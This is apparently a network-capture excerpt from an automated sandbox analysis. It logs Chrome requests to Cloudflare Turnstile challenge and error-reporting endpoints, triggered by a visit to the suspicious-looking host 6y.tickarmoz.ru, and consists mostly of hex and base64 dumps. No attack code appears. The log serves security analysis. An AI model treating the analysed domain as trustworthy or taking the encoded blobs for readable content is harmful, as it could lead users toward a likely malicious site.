                                                                                                                                                                                                  cf-chl-gen: bNUHGni0phI0KJ80qiZtjIBWlxTp9XFX3BtfGzOekUJ/X0FpKx/XdO4LoB1QY+C+aaxzMgnaYWOMbgeKuOhedshWFO7iyvTHwArO6WrIQb7k2cpWBY5duLiJKn9aIlczAwMuyvr8+oPUZh0nHNTZ9TbD252GFRml2z9UbXQhcrWzzG4PaVTfPTpma7POiYYsbUUngtkE7Vs5QStGuL+H4AxrKMMZzNSWgxNe6ZVo1nBCpOdgjY+f6nglHQ6QmSX1TOeH3MHMqi1jUXSp93Pc0faUXgrCZt7EQAraPlSzFgremS8hgZkjYwQ/wO0Jvx1vCRetTxBI64h6gLaVDYxruhqVgaG7zephkbQU4c64c4IVr93dwnjwv2/Z4uCIe0kJBqKWX5DcMPfxgl3rbaj8mUDoppp+XA9zC3kTKpWLH0fvGbWAVc15HiNm1R2bo68ESc0j/TX/5auZjxfHZQfogPQl385cOX5+iYbVfeR9Lpk=$D8z8JImaJn0rvfmZIJSNcg==
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  CF-RAY: 90211cf1cdd74308-EWR
                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                  2025-01-14 22:37:52 UTC618INData Raw: 64 4c 71 55 66 38 42 38 76 70 4f 30 76 5a 7a 45 6c 63 4f 2b 69 37 72 42 76 63 61 36 69 73 71 64 6a 5a 47 7a 71 4c 43 76 79 4d 32 61 7a 4a 71 6f 76 70 33 68 74 4c 79 37 31 4c 65 79 77 65 6d 32 79 71 6e 70 77 4d 66 76 38 2f 47 38 70 2b 48 67 37 4f 76 74 77 38 6e 71 31 74 4b 2b 33 64 66 73 2b 4f 48 34 78 72 36 2f 78 41 54 55 76 77 58 61 77 75 6a 49 79 76 4c 53 33 2b 6a 75 43 52 51 59 32 2f 59 59 48 4e 7a 54 48 51 7a 68 49 2b 58 79 42 2b 58 71 2f 41 51 61 48 52 44 37 44 41 73 4b 43 75 30 7a 4a 42 4d 56 2b 44 6a 35 4f 6a 54 78 2f 54 35 41 2b 67 51 46 52 42 52 48 42 6a 59 44 42 67 73 6e 47 51 77 53 44 30 67 48 52 44 67 76 4b 56 52 50 47 45 64 53 57 6c 68 4b 51 53 78 64 57 78 39 53 58 6c 5a 6c 5a 31 34 31 57 6b 70 63 55 6d 39 70 54 6a 46 51 5a 56 5a 52 4e 6a 56
                                                                                                                                                                                                  Data Ascii: dLqUf8B8vpO0vZzElcO+i7rBvca6isqdjZGzqLCvyM2azJqovp3htLy71Leywem2yqnpwMfv8/G8p+Hg7Ovtw8nq1tK+3dfs+OH4xr6/xATUvwXawujIyvLS3+juCRQY2/YYHNzTHQzhI+XyB+Xq/AQaHRD7DAsKCu0zJBMV+Dj5OjTx/T5A+gQFRBRHBjYDBgsnGQwSD0gHRDgvKVRPGEdSWlhKQSxdWx9SXlZlZ141WkpcUm9pTjFQZVZRNjV
                                                                                                                                                                                                  2025-01-14 22:37:52 UTC1369INData Raw: 70 59 53 6f 35 61 54 55 75 51 62 56 36 44 63 59 4b 4a 64 34 35 5a 58 4a 75 4e 6e 31 68 37 59 70 31 6c 58 59 43 42 63 6d 4f 6f 66 59 65 5a 68 58 70 39 61 6f 6d 42 74 4b 2b 59 67 6e 65 48 64 72 74 37 6d 4d 44 42 75 62 2b 58 73 36 2b 57 77 62 2b 4b 76 73 58 42 6a 73 50 52 76 36 75 4b 78 4a 58 56 78 73 50 46 73 74 48 57 71 70 36 62 77 5a 76 5a 6e 62 4b 33 34 4f 47 2f 76 64 4c 6d 79 4d 76 66 78 4d 71 77 38 2b 6e 64 30 4f 44 76 30 76 54 70 36 4f 7a 56 35 2f 44 49 79 38 37 43 7a 4f 37 65 76 75 44 59 43 66 34 4a 2f 65 6a 71 78 67 33 61 78 51 34 55 37 74 66 4f 2b 64 45 4c 42 65 34 56 48 52 34 42 42 42 73 67 37 2b 38 66 4a 50 4c 7a 49 79 6a 35 39 79 63 73 2f 50 73 72 4c 2b 63 41 4c 7a 50 35 42 44 4d 34 42 67 67 33 4f 2f 63 4d 4f 7a 38 2b 45 44 39 44 51 52 52 44 52
                                                                                                                                                                                                  Data Ascii: pYSo5aTUuQbV6DcYKJd45ZXJuNn1h7Yp1lXYCBcmOofYeZhXp9aomBtK+YgneHdrt7mMDBub+Xs6+Wwb+KvsXBjsPRv6uKxJXVxsPFstHWqp6bwZvZnbK34OG/vdLmyMvfxMqw8+nd0ODv0vTp6OzV5/DIy87CzO7evuDYCf4J/ejqxg3axQ4U7tfO+dELBe4VHR4BBBsg7+8fJPLzIyj59ycs/PsrL+cALzP5BDM4Bgg3O/cMOz8+ED9DQRRDR
                                                                                                                                                                                                  2025-01-14 22:37:52 UTC1369INData Raw: 46 6a 31 4b 59 56 47 52 55 65 32 64 34 61 34 71 63 6b 33 56 74 64 32 4e 67 68 5a 43 53 67 6e 4f 55 6c 6f 57 74 6d 4a 71 45 6f 5a 79 65 69 49 2b 67 6f 6f 32 52 6d 33 65 4c 6e 4a 46 2f 6e 4d 4b 2f 6a 70 62 45 77 72 2f 4c 6c 70 6d 5a 78 4d 43 64 6e 4d 6a 45 6f 5a 2f 4d 79 4b 57 69 30 4d 79 6f 30 39 54 51 72 4e 62 59 31 4c 44 5a 33 4e 69 30 33 4f 44 63 75 4f 66 6b 34 4c 7a 71 34 63 33 56 77 38 72 50 79 2b 71 35 30 39 4c 46 76 64 66 61 2b 38 48 76 34 2f 6e 4f 78 67 62 53 42 76 54 74 44 38 67 4b 36 4f 54 4c 30 4f 6e 6d 37 51 58 72 30 4e 63 62 39 41 37 7a 48 67 41 6a 46 66 4c 75 31 79 59 54 39 66 33 6b 34 68 67 43 43 76 73 52 4c 77 50 79 4b 67 41 75 43 66 45 4e 4b 69 6b 54 4e 43 6b 49 50 52 59 64 48 79 34 47 42 78 41 59 51 67 64 4a 4a 53 41 4e 50 44 41 4a 45 55
                                                                                                                                                                                                  Data Ascii: Fj1KYVGRUe2d4a4qck3Vtd2NghZCSgnOUloWtmJqEoZyeiI+goo2Rm3eLnJF/nMK/jpbEwr/LlpmZxMCdnMjEoZ/MyKWi0Myo09TQrNbY1LDZ3Ni03ODcuOfk4Lzq4c3Vw8rPy+q509LFvdfa+8Hv4/nOxgbSBvTtD8gK6OTL0Onm7QXr0Ncb9A7zHgAjFfLu1yYT9f3k4hgCCvsRLwPyKgAuCfENKikTNCkIPRYdHy4GBxAYQgdJJSANPDAJEU
                                                                                                                                                                                                  2025-01-14 22:37:52 UTC1369INData Raw: 6b 70 5a 54 5a 35 61 61 6d 57 75 61 6e 70 78 76 6e 71 4b 6a 5a 70 69 57 69 6f 71 6b 71 34 53 41 61 6f 43 6c 61 4c 65 70 72 71 6d 63 71 6e 61 4b 6d 5a 65 4c 6c 70 2b 57 74 5a 71 6a 6c 72 6d 65 70 62 79 39 6f 71 6d 38 73 4c 48 46 71 71 69 30 6c 4b 69 69 6c 71 4f 37 6c 39 43 74 6d 4c 36 55 74 4b 33 68 73 4b 53 31 75 73 44 72 78 4d 61 35 33 61 66 68 76 73 76 31 38 4b 37 59 38 38 65 36 35 4c 72 4b 74 72 59 43 37 74 75 36 2f 63 30 47 39 65 54 39 31 2f 37 4d 32 4f 55 45 42 42 4c 77 30 4f 44 65 30 74 2f 33 30 51 33 70 32 50 72 65 32 2b 6b 67 37 4e 34 55 39 76 30 6c 41 66 37 34 39 42 6f 75 37 53 45 65 44 79 66 71 46 4f 77 30 4d 68 67 5a 39 68 59 64 48 44 77 36 49 43 41 65 47 51 55 56 49 76 34 30 46 42 35 4d 49 30 68 46 54 55 35 41 4e 45 74 50 44 43 42 50 55 31 49
                                                                                                                                                                                                  Data Ascii: kpZTZ5aamWuanpxvnqKjZpiWioqkq4SAaoClaLeprqmcqnaKmZeLlp+WtZqjlrmepby9oqm8sLHFqqi0lKiilqO7l9CtmL6UtK3hsKS1usDrxMa53afhvsv18K7Y88e65LrKtrYC7tu6/c0G9eT91/7M2OUEBBLw0ODe0t/30Q3p2Pre2+kg7N4U9v0lAf749Bou7SEeDyfqFOw0MhgZ9hYdHDw6ICAeGQUVIv40FB5MI0hFTU5ANEtPDCBPU1I
                                                                                                                                                                                                  2025-01-14 22:37:52 UTC1369INData Raw: 59 74 37 6f 4a 57 41 67 33 4f 6e 5a 6f 57 44 71 49 57 74 6a 32 71 6a 62 47 75 49 72 4b 6d 72 68 5a 4b 51 6d 71 61 59 6c 71 68 7a 77 62 36 76 6d 59 47 54 73 35 36 42 70 36 79 73 72 62 2b 43 70 62 43 51 72 4d 2b 75 6c 35 47 68 6b 64 71 37 78 74 57 70 33 74 47 55 6f 74 66 5a 32 75 66 70 33 4b 72 71 79 63 66 61 70 75 72 61 79 73 33 48 73 38 6a 41 37 2f 6a 70 79 63 7a 38 31 72 7a 51 41 64 72 37 31 41 58 65 37 39 67 4a 33 4e 33 63 44 64 2f 4d 34 42 48 6a 44 4f 51 56 35 2f 67 45 37 50 45 4e 47 39 6e 30 45 51 76 63 39 2b 33 6b 2f 75 55 70 2f 43 50 6a 33 66 30 64 37 69 45 46 4c 50 37 39 44 69 58 32 45 77 30 30 4a 67 37 30 4c 66 41 4c 46 54 6b 57 49 2f 73 52 50 44 45 68 4e 7a 55 49 42 6b 73 61 4a 55 31 45 47 30 41 71 50 30 59 30 53 78 41 62 4a 43 78 63 48 42 68 64
                                                                                                                                                                                                  Data Ascii: Yt7oJWAg3OnZoWDqIWtj2qjbGuIrKmrhZKQmqaYlqhzwb6vmYGTs56Bp6ysrb+CpbCQrM+ul5Ghkdq7xtWp3tGUotfZ2ufp3Krqycfapurays3Hs8jA7/jpycz81rzQAdr71AXe79gJ3N3cDd/M4BHjDOQV5/gE7PENG9n0EQvc9+3k/uUp/CPj3f0d7iEFLP79DiX2Ew00Jg70LfALFTkWI/sRPDEhNzUIBksaJU1EG0AqP0Y0SxAbJCxcHBhd
                                                                                                                                                                                                  2025-01-14 22:37:52 UTC1369INData Raw: 74 67 69 47 69 46 66 6f 64 6c 62 6d 68 36 73 34 75 72 64 49 36 54 73 59 4f 44 6b 4c 4a 39 6c 35 75 34 67 4c 47 62 75 34 50 44 75 72 36 63 6f 72 56 2f 6a 71 58 4e 30 4b 54 41 69 73 32 4d 78 61 79 74 6d 72 4b 61 6a 35 32 32 73 35 69 7a 6d 63 54 69 70 62 33 45 32 71 6a 47 71 36 58 42 79 37 6a 73 71 4c 33 6c 74 4d 69 75 77 4b 2f 52 2f 4c 75 7a 30 4d 76 58 31 4f 2f 44 30 4f 50 32 2f 4e 2f 31 43 4e 4d 42 32 73 34 47 7a 41 66 63 30 4f 44 65 30 64 66 32 41 2f 54 79 2b 73 38 65 47 77 7a 31 33 65 38 51 41 68 6e 5a 2b 43 66 37 2b 2f 6b 64 44 69 51 62 2b 77 44 37 46 52 55 4b 41 42 6b 5a 44 67 55 34 43 52 51 64 51 41 77 4c 4d 44 45 51 46 44 55 35 51 44 4d 6b 53 54 30 70 4c 42 78 52 48 51 6f 55 52 53 35 4b 4d 45 64 49 56 79 6b 38 54 30 42 41 48 46 73 79 56 7a 6c 58 4e
                                                                                                                                                                                                  Data Ascii: tgiGiFfodlbmh6s4urdI6TsYODkLJ9l5u4gLGbu4PDur6corV/jqXN0KTAis2MxaytmrKaj522s5izmcTipb3E2qjGq6XBy7jsqL3ltMiuwK/R/Luz0MvX1O/D0OP2/N/1CNMB2s4GzAfc0ODe0df2A/Ty+s8eGwz13e8QAhnZ+Cf7+/kdDiQb+wD7FRUKABkZDgU4CRQdQAwLMDEQFDU5QDMkST0pLBxRHQoURS5KMEdIVyk8T0BAHFsyVzlXN
                                                                                                                                                                                                  2025-01-14 22:37:52 UTC1369INData Raw: 73 68 49 57 4c 69 48 43 70 62 49 43 6a 6b 49 71 32 72 59 69 32 66 37 2b 4c 6f 37 46 39 74 5a 48 48 6d 35 72 48 71 63 65 45 74 71 36 69 6e 4c 4f 4f 73 35 43 78 70 59 2b 53 79 37 57 75 74 4b 37 56 72 64 4c 42 31 38 53 76 73 74 65 30 6f 61 47 39 79 4d 71 75 71 37 6e 76 7a 2b 44 53 36 39 37 50 39 4f 6e 55 31 76 57 7a 76 74 61 36 41 62 38 42 76 67 44 46 33 66 30 47 79 74 50 72 78 67 44 49 78 2b 51 4a 79 67 66 4c 31 4f 37 6a 32 64 59 4b 2b 78 34 52 37 75 6a 35 48 4f 30 50 33 78 48 35 45 68 33 37 4b 2f 6b 62 42 7a 45 4a 4d 53 30 69 46 4f 34 76 42 69 73 4e 4d 66 49 76 2b 76 54 31 48 41 49 43 4d 44 34 47 42 52 38 55 51 51 6c 4a 4a 52 73 42 49 52 70 51 48 51 39 45 4a 79 34 4b 57 6c 67 52 53 44 35 48 56 69 78 55 4b 69 46 68 4a 47 41 6b 51 6d 63 33 4b 6c 52 63 5a 55
                                                                                                                                                                                                  Data Ascii: shIWLiHCpbICjkIq2rYi2f7+Lo7F9tZHHm5rHqceEtq6inLOOs5CxpY+Sy7WutK7VrdLB18Svste0oaG9yMquq7nvz+DS697P9OnU1vWzvta6Ab8BvgDF3f0GytPrxgDIx+QJygfL1O7j2dYK+x4R7uj5HO0P3xH5Eh37K/kbBzEJMS0iFO4vBisNMfIv+vT1HAICMD4GBR8UQQlJJRsBIRpQHQ9EJy4KWlgRSD5HVixUKiFhJGAkQmc3KlRcZU
                                                                                                                                                                                                  2025-01-14 22:37:52 UTC1369INData Raw: 72 61 6c 33 71 62 71 6b 72 37 53 6f 6a 34 32 33 72 4c 69 4f 6b 4b 36 56 76 38 43 44 69 4b 57 65 70 61 61 72 79 4a 71 4a 6a 70 43 6d 6a 63 6d 50 6d 71 4f 37 33 64 4b 74 6b 71 37 58 72 38 32 63 73 72 75 77 33 73 44 65 35 4f 48 4a 37 38 50 43 38 4d 4b 30 38 39 37 46 37 4d 53 7a 75 4e 58 4f 31 64 62 62 2b 4d 71 35 76 73 44 57 76 66 6d 2f 79 74 50 72 44 67 50 64 77 74 34 49 33 2f 33 4d 34 75 76 67 44 2f 44 38 32 52 4c 35 49 50 76 79 49 50 4c 39 48 52 58 68 34 4f 51 68 35 52 7a 6a 47 67 41 51 37 43 63 43 38 77 6b 6e 42 43 77 43 2b 53 6e 32 50 50 77 58 48 42 38 34 45 43 37 38 45 78 77 52 50 79 45 72 53 55 49 71 55 43 77 6a 55 43 4d 75 54 55 55 53 45 52 56 52 46 6b 77 55 53 6a 42 41 48 56 63 79 4a 44 6c 58 4e 46 73 71 49 56 6c 49 5a 53 34 6d 54 44 49 72 56 58 52
                                                                                                                                                                                                  Data Ascii: ral3qbqkr7Soj423rLiOkK6Vv8CDiKWepaaryJqJjpCmjcmPmqO73dKtkq7Xr82csruw3sDe5OHJ78PC8MK0897F7MSzuNXO1dbb+Mq5vsDWvfm/ytPrDgPdwt4I3/3M4uvgD/D82RL5IPvyIPL9HRXh4OQh5RzjGgAQ7CcC8wknBCwC+Sn2PPwXHB84EC78ExwRPyErSUIqUCwjUCMuTUUSERVRFkwUSjBAHVcyJDlXNFsqIVlIZS4mTDIrVXR
                                                                                                                                                                                                  2025-01-14 22:37:52 UTC1369INData Raw: 71 61 50 74 72 75 71 6f 49 43 64 6c 70 2b 50 6e 62 4b 36 6c 37 2b 5a 6a 62 71 4d 78 6f 54 43 77 36 79 6e 71 38 32 6c 78 39 62 59 72 4c 69 36 34 5a 69 66 75 37 75 6c 6d 4c 47 2f 70 4b 43 68 78 4c 71 74 35 74 2b 77 34 2b 2f 66 73 75 72 4c 74 38 6e 36 35 4c 58 50 33 37 76 4b 31 75 33 43 30 74 4c 47 2f 63 44 48 2b 77 6a 70 79 51 45 48 44 4e 7a 6c 38 76 51 4b 43 38 38 55 41 78 4c 6e 45 4f 6e 6d 31 78 33 78 2f 41 41 41 48 75 41 63 46 75 62 34 39 2b 76 39 4c 78 6e 70 42 42 54 76 2f 67 73 69 39 67 63 48 2b 6a 4c 30 2b 7a 41 38 48 76 30 31 4f 30 41 52 47 69 67 41 50 6a 38 45 53 44 64 47 48 45 51 65 47 77 78 52 4a 6a 45 30 4e 46 6b 56 55 45 6f 62 4c 53 77 67 4d 6d 4e 4e 48 6a 68 49 4a 44 4d 2f 56 69 73 37 4f 79 39 6d 4b 54 42 6b 63 46 49 79 61 57 39 30 52 55 35 76
                                                                                                                                                                                                  Data Ascii: qaPtruqoICdlp+PnbK6l7+ZjbqMxoTCw6ynq82lx9bYrLi64Zifu7ulmLG/pKChxLqt5t+w4+/fsurLt8n65LXP37vK1u3C0tLG/cDH+wjpyQEHDNzl8vQKC88UAxLnEOnm1x3x/AAAHuAcFub49+v9LxnpBBTv/gsi9gcH+jL0+zA8Hv01O0ARGigAPj8ESDdGHEQeGwxRJjE0NFkVUEobLSwgMmNNHjhIJDM/Vis7Oy9mKTBkcFIyaW90RU5v


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  15192.168.2.164972135.190.80.14436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2025-01-14 22:37:52 UTC532OUTOPTIONS /report/v4?s=r1xFHWiy9RDbNdDm%2B6ppedYyYm0155nF1S%2F9Nc1kCjcncOXICpU484wOgnf8a7UD8IFVYy7dg98sE8yyFoQJe3wYahBWkX7yQ4wMTONU260DJiwAikdXS5v0EqxrFA%3D%3D HTTP/1.1
                                                                                                                                                                                                  Host: a.nel.cloudflare.com
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  Origin: https://6y.tickarmoz.ru
                                                                                                                                                                                                  Access-Control-Request-Method: POST
                                                                                                                                                                                                  Access-Control-Request-Headers: content-type
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                  2025-01-14 22:37:52 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                  access-control-max-age: 86400
                                                                                                                                                                                                  access-control-allow-methods: OPTIONS, POST
                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                  access-control-allow-headers: content-type, content-length
                                                                                                                                                                                                  date: Tue, 14 Jan 2025 22:37:52 GMT
                                                                                                                                                                                                  Via: 1.1 google
                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  16192.168.2.164972335.190.80.14436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2025-01-14 22:37:52 UTC474OUTPOST /report/v4?s=r1xFHWiy9RDbNdDm%2B6ppedYyYm0155nF1S%2F9Nc1kCjcncOXICpU484wOgnf8a7UD8IFVYy7dg98sE8yyFoQJe3wYahBWkX7yQ4wMTONU260DJiwAikdXS5v0EqxrFA%3D%3D HTTP/1.1
                                                                                                                                                                                                  Host: a.nel.cloudflare.com
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  Content-Length: 426
                                                                                                                                                                                                  Content-Type: application/reports+json
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                  2025-01-14 22:37:52 UTC426OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 33 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 36 79 2e 74 69 63 6b 61 72 6d 6f 7a 2e 72 75 2f 61 59 35 37 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 34 30 2e 31 33 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22
                                                                                                                                                                                                  Data Ascii: [{"age":0,"body":{"elapsed_time":133,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://6y.tickarmoz.ru/aY57/","sampling_fraction":1.0,"server_ip":"172.67.140.133","status_code":404,"type":"http.error"},"type":"network-error","
                                                                                                                                                                                                  2025-01-14 22:37:52 UTC168INHTTP/1.1 200 OK
                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                  date: Tue, 14 Jan 2025 22:37:52 GMT
                                                                                                                                                                                                  Via: 1.1 google
                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  17192.168.2.1649727104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2025-01-14 22:37:53 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1505571972:1736892714:9ZzSSdQkrASfPzbc2F-di7JK8klPv-kLQYqOPftQ7_o/90211ce78d29726b/l2D8zMoXa112OUBHqOGd5MV.i80dS5C.AQyPKeXZh0o-1736894270-1.1.1.1-Zg623OGWeh.XscTSOHcwhUPwmQJPRgVW7Cm6FtO8BTyNk8EmFH1CI7QxhAT0d9n7 HTTP/1.1
                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                  2025-01-14 22:37:53 UTC442INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 22:37:53 GMT
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  Content-Length: 14
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                  cf-chl-out: 7bWjTpPXHrbF5olF9hIOF1VGWc7PPoQ+R1Rc/ExujgsYJFvXOgSfOo0gDTrdHR3fP3WQjnfK9/MqS9lbgssV7w==$iwk3sBa5H7eLif/AXkZCiA==
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  CF-RAY: 90211cf7ef91b9c5-EWR
                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                  2025-01-14 22:37:53 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                                                                                                                                                                  Data Ascii: {"err":100230}


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  18192.168.2.1649729104.18.95.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2025-01-14 22:37:53 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/90211ce78d29726b/1736894272348/101bfdbf082dd482f8356507d292f211b10f12d96672741a8dbd41f11a4bd0ba/p0aOx1kBZtBR-nk HTTP/1.1
                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/3m5i4/0x4AAAAAAA2KDshloYH759ec/auto/fbE/normal/auto/
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                  2025-01-14 22:37:54 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 22:37:54 GMT
                                                                                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                  Content-Length: 1
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  2025-01-14 22:37:54 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 45 42 76 39 76 77 67 74 31 49 4c 34 4e 57 55 48 30 70 4c 79 45 62 45 50 45 74 6c 6d 63 6e 51 61 6a 62 31 42 38 52 70 4c 30 4c 6f 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                                                                                                  Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gEBv9vwgt1IL4NWUH0pLyEbEPEtlmcnQajb1B8RpL0LoAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                                                                                                  2025-01-14 22:37:54 UTC1INData Raw: 4a
                                                                                                                                                                                                  Data Ascii: J


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  19192.168.2.1649730104.18.95.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2025-01-14 22:37:54 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/90211ce78d29726b/1736894272349/Y6BOUtUVqa43Gyq HTTP/1.1
                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/3m5i4/0x4AAAAAAA2KDshloYH759ec/auto/fbE/normal/auto/
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                  2025-01-14 22:37:54 UTC200INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 22:37:54 GMT
                                                                                                                                                                                                  Content-Type: image/png
